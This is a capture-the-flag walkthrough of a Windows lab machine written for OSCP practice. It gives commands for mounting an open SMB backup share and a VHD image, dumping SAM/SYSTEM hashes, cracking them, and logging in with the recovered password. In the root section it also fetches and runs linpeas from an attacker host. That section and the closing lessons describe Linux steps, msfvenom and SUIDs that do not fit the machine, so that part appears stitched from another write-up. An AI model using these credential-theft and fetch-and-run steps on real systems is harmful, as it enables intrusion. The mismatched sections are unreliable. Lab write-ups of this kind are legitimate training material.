Follow along in my OSCP journey, this is my target 13 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.134Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEn
jtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+O
KaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH
+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrA
Xa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCThis machine is really nice because there are a lot of services and going through the process of checking them out will help you filter faster in the future.
SMB — 139,445
This is where autorecon is really nice for us, if you go into your scan you’ll see a lit of scritps results around all the services that nmap found. Let’s focus on the SMB.
cat smbmap-list-contents.txt
[!] Authentication error on 10.10.10.134
[+] Guest session IP: 10.10.10.134:445 Name: 10.10.10.134
[-] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\THAEXPIYGU, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
.\Backups\*
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 .
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 ..
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 CRZONWVISU
fw--w--w-- 116 Tue Apr 16 07:43:19 2019 note.txt
fr--r--r-- 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 THAEXPIYGU
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
.\Backups\WindowsImageBackup\*
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 .
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 ..
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 L4mpje-PC
.\Backups\WindowsImageBackup\L4mpje-PC\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 Backup 2019-02-22 124351
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 Catalog
fr--r--r-- 16 Fri Feb 22 07:44:02 2019 MediaId
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 SPPMetadataCache
.\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 37761024 Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 5418299392 Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 1186 Fri Feb 22 07:45:32 2019 BackupSpecs.xml
fr--r--r-- 1078 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c
7-5e52-4d5e-8b20-19adc95a34c7.xml
fr--r--r-- 8930 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
fr--r--r-- 6542 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
fr--r--r-- 2894 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d
07-adb0-3bee2926fd7f.xml
fr--r--r-- 1488 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-47
3c-9f4f-7847f01fc64f.xml
fr--r--r-- 1484 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e
6c-bb19-49d8f43532f0.xml
fr--r--r-- 3844 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d
15-a586-71dbb18f8485.xml
fr--r--r-- 3988 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-44
26-9c58-531aa6355fc4.xml
fr--r--r-- 7110 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46
c7-9181-d62844cdc0b2.xml
fr--r--r-- 2374620 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-44
64-a53e-1050253ae220.xml
.\Backups\WindowsImageBackup\L4mpje-PC\Catalog\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 5698 Fri Feb 22 07:45:32 2019 BackupGlobalCatalog
fr--r--r-- 7440 Fri Feb 22 07:45:32 2019 GlobalCatalog
.\Backups\WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 57848 Fri Feb 22 07:45:32 2019 {cd113385-65ff-4ea2-8ced-5630f6feca8f}
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2e0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1c4-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-350-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-3dc-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5e8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 winreg
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 openssh-ssh-agent
fr--r--r-- 6 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-590-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-24c-0
What about the permissions?
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPCHINT
What does these permissions allow us to do?
.
.
.
.
HINT
Ask ChatGPT the following question: “What can I do if the permissions of an SMB share are read/write”
.
.
.
.
These permissions allow us to mount shares locally ❤
Let’s mount the shares we have access to
sudo mkdir /mnt/backups
sudo mount -t cifs //10.10.10.134/Backups /mnt/backupsIt looks like we have the complete machines backup, how can we find a way in with that?
I imagine we should be able to restore the backup or the SAM file with some credentials?
What are those vhd files at the top?
Can we mount these?
https://stackoverflow.com/questions/36819474/how-can-i-attach-a-vhdx-or-vhd-file-in-linux
Let’s install the lib with guestmount
sudo apt-get install libguestfs-toolsCreate the mount folder /mnt/test/backup (just an example)
sudo guestmount --add /mnt/backup/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6
e6963.vhd --inspector --ro /mnt/test/backupWe try to find passwords inside the users folder but nothing
HINT
Where and how can we dump credentials???
.
.
.
.
I found this article and it seems we can find the password hashes in a couple of different places
We found what looks like our use case
Where the hell are SAM and SYSTEM hives?
Let’s look at the /windows/system32/config folder
We copy the hives in our loot folder
root@kali:/mnt/test/backup/Windows/System32/config# cp SAM /home/kali/Documents/HTB/lab/10.10.10.134/loot/
root@kali:/mnt/test/backup/Windows/System32/config# cp SYSTEM /home/kali/Documents/HTB/lab/10.10.10.134/loot/
samdump2 ./SYSTEM ./SAM
You can also use dumpsecrets.py
/opt/impacket/examples/secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
Let’s crack the hash
you can just save the hash to a file and run john
john --wordlist=/usr/share/wordlists/rockyou.txt hash_fileBut I always check on crackstation to save some time if it’s already been cracked
creds L4mpje:bureaulampje
We should be able to use evil-winrm with those credentials
evil-winrm -i 10.10.10.134 -u 'L4mpje' -p 'bureaulampje' -P 5985
Ok we can also try SSH
ssh l4mpje@10.10.10.134
We got the user flag!
Where and how can we dump credentials???
Time for some shell upgrade 😉
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let’s get the user flag
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)Nothing of interest unfortunately.
Enumeration scripts
This is where we upload our linpeas, LinEnum and Exploit Suggester.
On our attacking machine
We start by setting our Simple Python HTTP Server
sudo python -m SimpleHTTPServer 80
On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.
cd /tmp/
wget http://attacking_ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.shIt seems that nothing was outputted sometimes you need to execute it directly with bash
bash linpeash.sh --> that should workThere are a lot of interesting items in the linpeas output.
HINT
What seems to be the fastes way to get root out of the shiny things?
.
.
.
.
Let’s look at the items relevant in the scan
What did I learn?
- We learned why some backdoors might not comeback to us due to firewalls blocking them. But also that our reverse shells could get blocked by firewall. If a shell doesn’t pick upafter a couple of time start testing for other ports, usually the ones which are exposed.
- A very fast way to get root is check the program versions and look for exploits, the internet is filled with PoCs to exploit vulnerable software.
- We learned how to modify scripts by creating our own payloads with msfvenom. There is a lot more to explore with msfvenom but due to the leng of the walkthrough I kept it short. Check these 2 references for more information on how to create your own payloads for different situations: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/ and https://netsec.ws/?p=331
- We learned about GTFOBins and how it can help you quickly exploit SUIDs.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
